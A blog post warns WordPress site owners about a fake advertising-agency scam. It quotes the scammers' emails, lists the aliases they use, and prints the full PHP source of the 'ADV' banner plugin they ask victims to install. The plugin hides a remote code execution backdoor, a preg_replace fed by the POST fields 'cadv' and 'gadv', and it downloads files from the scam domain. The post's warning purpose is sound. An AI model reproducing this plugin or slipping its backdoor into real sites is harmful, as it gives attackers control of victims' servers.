get a Merry Christmas banner
Yesterday I got an interesting email through the contact me page on my site inquiring me about the advertisement slot on Astronyu.com. The guy (presumably from the name) was called Erwan Brun and using email [email protected]. He introduced himself being from an advertising company called Bizotto and have a client who are interested to buy advertising spot on my site.
Flag #1: Advertiser
This makes me chuckles to be honest. In his email he claimed Lacoste Inc (I’m a HUGE fan) is interested to buy advertising spot on my low traffic blog which is totally impossible.
Flag #2. The Email Conversation.
Hello, Thanks for reply to our proposal! I represent Bizotto Agency. At the moment we are preparing an advertising campaign for Lacoste Company (it is a French company producing clothes, footwear, perfumery etc.) We already have designed banners for the campaign, they are the following sizes: 160x600, 240x400, 300x250, 336x280, 468x60, 728x90. What can be your price for one banner (banner should appear at ALL pages of your site) of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? Please mention a normal link for banner, without javascript code and set prices in US dollars per month. Unfortunately, we can\'t place our banners through the mentioned system. All our banners must be controlled by the plug-in, it is advertiser\'s requirement. If you are willing to work this way, please provide us with the information we requested above. Best regards, Erwan Brun. site: <a href="http://www.bizotto.com/">www.bizotto.com</a> e-mail: <a href="mailto:[email protected]">[email protected]</a> phone: + (0)9 78 62 93 64
Soon after I replied his email with the pricing table, I received his response email.
Hi! Thanks for reply to our proposal! We like your price. To pass to the banner control system follow the link <a class="moz-txt-link-freetext" href="http://webmaster.bizotto.com/">http://webmaster.bizotto.com</a> To enter use the following data: login: <a class="moz-txt-link-abbreviated" href="../">www.astronyu.com</a> password: HIK3B1M You should install and activate the plugin in order to display advertisement. Before making payment, advertiser must approve location of the banner. The banner will be shown on your site when you add special code to your web- address (for example: <a class="moz-txt-link-freetext" href="../?adv_test=1">http://www.astronyu.com/?adv_test=1</a>). It means, that visitors will see the banner only if it is approved and payment made. To get installation instruction for your site type pass to: <a class="moz-txt-link-freetext" href="http://docs.bizotto.com/wp_install">http://docs.bizotto.com/wp_install</a> To activate your site you have to enter the code: K3M-ZBT-S9N What way of payment is suitable for you? Best regards, Erwan Brun. site: <a class="moz-txt-link-abbreviated" href="http://www.bizotto.com/">www.bizotto.com</a> e-mail: <a class="moz-txt-link-abbreviated" href="mailto:[email protected]">[email protected]</a> phone: + (0)9 78 62 93 64
As I’m a bit skeptical when it comes to install a plugin without having knowledge of it and the second I received this email, I looked up Google and surprisingly there are tons of results about the same scam happening all over the net. As I did not install the plugin, I have zilch clue what it will do to my site or worse server but boy I’m glad I have Google. 🙂
So boys and girls, be an extra careful when someone asked you to install something that you have no idea what it does, always check the Internet. If you found a scam, you can file a complaint (like I do) to FBI by completing the form at www.ic3.gov (Internet Crime Complaint) and be sure to have the sender’s email headers handy. If you are interested in a decent banner professional (let’s say you want to get a Merry Christmas banner), we are at your disposal.
Here are some of the names and company being used in this kind of scam:
- Erwan Brun / Bizotto Agency
- Noah Vincent / Legretto Agency
- Tristan Muller / Gana Agency
- Valentin Lopez / Gera Agency
- Matthieu Colin / NanaAgency
- Oscar Meunier / Kervel Agency
- Eliott Arnaud / Larko Agency
- Lilian Marchand / Lemma Agency
- Rayan Meyer / Bevesto Agency
- and others …
and all of them using the same website template (French website with orange theme).
If you’re talented in php, maybe you can find what’s being hidden in this code (downloaded from the scam site cum control panel):
<?php /* Plugin Name: ADV Description: ADV Plugin Version: 2.6.1 */ class AdvWidget extends WP_Widget { function AdvWidget() { parent::WP_Widget(false, $name = 'AdvWidget'); } /** @see WP_Widget::widget */ function widget($args, $instance) { if (get_option('adv_place') == 'widget') advShowBanner(); } /** @see WP_Widget::update */ function update($new_instance, $old_instance) { $instance = $old_instance; $instance['title'] = strip_tags($new_instance['title']); return $instance; } function form($instance) { } } add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");')); add_action('admin_menu', 'advPluginMenu'); register_activation_hook(__FILE__, 'advActivation'); define('ADV_SERVICE_DOMAIN', 'bizotto.com'); define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key'); function advReadUrl($url) { if (function_exists('curl_init')) { $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_URL, $url); $result = curl_exec($curl); curl_close($curl); return $result; } else return file_get_contents($url); } function advActivation() { update_option('adv_place', 'widget'); } register_deactivation_hook(__FILE__, 'advDeactivation'); function advDeactivation() { delete_option('adv_key'); } function advPluginMenu() { add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions'); } function adv_show_banner() { advShowBanner(); } function advShowBanner() { $advBanner = get_option('adv_banner'); $advMode = get_option('adv_mode'); if ($advBanner) { if (isset($_REQUEST['adv_test']) || $advMode == 'work') { echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>"; } } } function activateCode() { $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST'])); if (strpos($data, '<key>true</key>') !== FALSE) { preg_match("#<width>(.+?)</width>#", $data, $arr); update_option('adv_width', $arr[1]); preg_match("#<height>(.+?)</height>#", $data, $arr); update_option('adv_height', $arr[1]); echo '<div id="message" class="updated"><p>The code is activated successfully.</p></div>'; update_option('adv_key', $_REQUEST['key']); downloadBanners(); } else { echo '<div id="message" class="updated"><p>Code activation error.</p></div>'; } } function downloadBanners() { $bannersDir = ABSPATH . "/adv_banners"; if (!is_dir($bannersDir)) { mkdir($bannersDir); } $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key")); preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners); preg_match("|<adv>(.+?)</adv>|", $list, $adv); preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner); preg_match("|<mode>(.+?)</mode>|", $list, $mode); if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) { update_option("adv_banner", $showBanner[1]); update_option('adv_mode', $mode[1]); foreach ($banners[1] as $banner) { $advBannerDir = $bannersDir . "/" . $adv[1]; if (!is_dir($advBannerDir)) mkdir($advBannerDir); $arr = explode("/", $banner); if (count($arr) == 2) { $size = $arr[0]; $bfile = $arr[1]; if (!is_dir($advBannerDir . "/" . $size)) mkdir($advBannerDir . "/" . $size); file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner)); } } echo '<div id="message" class="updated"><p>Banners are downloaded successfully.</p></div>'; } } if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv'])) $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6'); function advPluginOptions() { if (!current_user_can('manage_options')) { wp_die(__('You do not have sufficient permissions to access this page.')); } $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : ''; if ($action == 'downloadBanners') { downloadBanners(); } elseif ($action == 'setPlace') { update_option('adv_place', $_REQUEST['adv_place']); } elseif ($action == 'saveKey') { activateCode(); } $advPlace = get_option('adv_place'); echo '<div class="wrap">'; echo '<h2>ADV</h2>'; echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">'; echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>'; echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>'; echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>'; echo '</select>'; echo '<input type="submit" value="Save"/></form>'; echo '<div>'; if (get_option('adv_key') === FALSE) { echo '<h2>Activation Code</h2>'; echo '<form method="post" action="?page=adv-identifier&action=saveKey">'; echo '<input type="text" name="key"/>'; echo '<input type="submit" value="Activate"/>'; echo '</form>'; } else { $mode = get_option('adv_mode'); echo '<br/>Code: ' . get_option('adv_key'); echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>'; echo 'Mode: ' . $mode; if ($mode != 'work') { $url = get_option('siteurl') . "/?adv_test=1"; $link = "<a href='$url'>$url</a>"; echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment. To see where the banner will be placed on your site, use the special feature in the site address: ' . $link; } } echo '</div>'; echo '</div>'; } ?>
[UPDATE]
I finally replied back saying I know the scam and do not contact me anymore. As I suspected, I got the same generic reply. LoL..seriously whoever running this scam must have a lot of time on their hand, or it is possible this is just a script.
Hi! Unfortunately, the advertiser rejected your site. He has already gained the required number of advertising platforms for this season. Sorry for trouble you. You can remove plug-in. As soon as our client resumes an advertising campaign we will contact you. Thank you and hope to cooperate with you in the future! Best regards, Erwan Brun. site: <a href="http://www.bizotto.com/">www.bizotto.com</a> e-mail: <a href="mailto:[email protected]">[email protected]</a> phone: + (0)9 78 62 93 64
I want to buy and install this in my computer to remove a lot of scam it cause damage in your pc…
I dont like any malicious..I would try to find some plug in for this..Scam is such a malicious kind..Thank you for sharing this kind of post informative..
Add this name to the list:
Noa Joly
site: www.anriagency.com
e-mail: [email protected]
@dougunplugged sure, I’ll add it to the list. Thanks.
Fortunately this version isn’t malicious – YET , think they were harvesting info. I got hit as well 🙁
@jamesyeang Yeah, I too checked my server just in case there is something created after I installed the plugin and so far hasn’t found anything.